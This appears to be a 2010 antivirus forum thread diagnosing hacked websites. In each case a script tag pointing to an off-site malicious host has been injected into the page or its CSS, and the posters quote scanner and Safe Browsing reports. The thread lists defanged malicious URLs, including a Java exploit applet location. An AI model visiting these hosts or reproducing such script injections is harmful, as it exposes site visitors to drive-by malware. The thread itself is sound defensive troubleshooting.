Report 2010-07-03 23:05:02 (GMT 1)
Website happytailspetservices.com
Domain Hash 0455f15839fb3e0e8f659e13e4975e58
IP Address 173.201.137.68 [SCAN]
IP Hostname ip-173-201-137-68.ip.secureserver.net
IP Country US (United States)
AS Number 26496
AS Name PAH-INC - GoDaddy.com, Inc.
Detections 1 / 17 (6 %)
Status SUSPICIOUS Scanning site with: Finjan DETECTED
There is a script tag outside the closing html tag, a standards no, no and highly suspect. It is trying to run a javascript file from another site (which has nothing to do with yahoo), see image2. This is a malicious site which would be blocked by avast (image3) and firefox (image4) also see, https://safeweb.norton.com/report/show?name=blackhulu.com.
So it looks like the happytailspetservices.com site has been hacked and the detection is most certainly correct.
Yes, it is easy to ignore what is in front of your nose when the alert is apparently coming from a parent site ;D
@ cinvan1121
Now you have to contact the hacked site or check it out if it is within your control and remove inserted script tag. More importantly you need to close whatever vulnerability that has allowed the site to be exploited/hacked.
Therefore unmasked parasites is such a good resource, because it gives you all redirects and subdomains and links, and you have to check these also separately. And just scanners that take the main domain fail to get all the malcode that way: happytailspetservices.com - but the infection and the suspicious script is: assolkh.blackhulu.com suspicious - displaying 1 of 1
* <Script> link - htxp://assolkh.blackhulu.com:8080/Yahoo.js
Malicious software includes 31 exploits, 13 trojans, 1 scripting exploits.
Threat Name: Bloodhound.Exploit.292
Location: htxp://assolkh.blackhulu.com:8080/Applet1.html
This site was hosted on 1 network including AS7795 (NTELOSINC).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, blackhulu.com appeared to function as an intermediary for the infection of 12 sites including techmyhelp.com/, skyventure.com.my/, setdaccio.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 74 domains, including raidmax.com/, thavage.com/, vestonkhuongduy.com/,
polonus
P.S. Example of this iFrame injection here: htxp://jsunpack.jeek.org/dec/go?report=63af26934bd3bb5f3f7df4e128e4a7ea4b8eb332 (Open with NS active, malicious)
What is it? It comes courtesy of a java deployment toolkit - example:
2010/05/15_21:10 yoursoap.ru:8080/Applet1html 174.137.179.244 digit-colo.amsnl.webaircom. exploit for java deployment toolkit veerATmaillife.ru 36057
will only attempt to infect Internet Explorer and Google Chrome users, so use Fx with NS and RP active!
The final target and what malware might be on it is immaterial as avast doesn’t allow it to get anywhere near it.
The problem in this case as the OP is concerned about the fact avast alerts on their site happytailstucson.com, because a cross site link where date is imported from happytailspetservices.com has been hacked and it is that which avast is alerting on because it has been hacked with the insertion of the script tag.
We don’t really need to know what is on blackhulu.com as that could well change at the drop of a hat. We are trying to help the OP to resolve their problem which has nothing to do with the payload at blackhulu.com; that problem is the hacking of happytailspetservices.com.
If that problem is resolved then the final destination is immaterial; we don’t need to go to that depth to help the OP to resolve their problem other than say the detection is good.
The site has been hacked via a java exploit, so check to have the latest java there, and it might well be that thanks to avast users never came even close to the malware (if there was an active payload at the time), because they were disconnected or alerted well in advance, malcode nor exploits belong on a reputable website, they should be cleansed,
We are having a similar issue with website wXw.osundefender.org , avast seems to be detecting virus HTML:Script-Inf, I have ran website through a number of online scanners (Dr. Web, NovirusThanksYou) and none seem to detect this… Could this be a case of Avast blacklisting the website? Please advise…
The css file that is called from the index page appears to have been hacked see image1, apart from css instructions there is a script tag to an off site URL, which is suspect, image2. The same script tag is also at the end of the index.php page causing avast to alert on that too image3.
So it isn’t only avast detecting this, though there are actually very few even looking for this type of thing much less detect it.
The site that the script tag tries to run is one that avast considers a malicious site image4, avast isn’t the only on that considers this Russian site malicious, http://www.mywot.com/en/scorecard/holasionweb.com.
Please ‘modify’ your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.
Well the sublink is there on unmasked parasites:
The last time Google visited this site was on 2010-05-21, and the last time suspicious content was found on this site was on 2010-05-20.
Malicious software includes 109 scripting exploits, 1 trojan.
This site was hosted on 4 network(s) including AS50108 (KALUGANET), AS16276 (OVH), AS2588 (LATNETSERVISS).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, holasionweb.com appeared to function as an intermediary for the infection of 3 sites including ffl.org/, cosmicbooknews.com/, 365dailynews.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software and it infected 35 domains, including moomha.com/, venciclopedia.com/, pattonwebz.com/. (the last one was reported by me on the avast forums - pol)
Avast free antivirus 5 gives HTML:Script-inf virus alert for the webpage: wxw.sajtorandevu.hu
I had it checked with the designer but there is no code what is wrong there, and we can not figure out the problem, how could I know what is this script that might bother the Avast?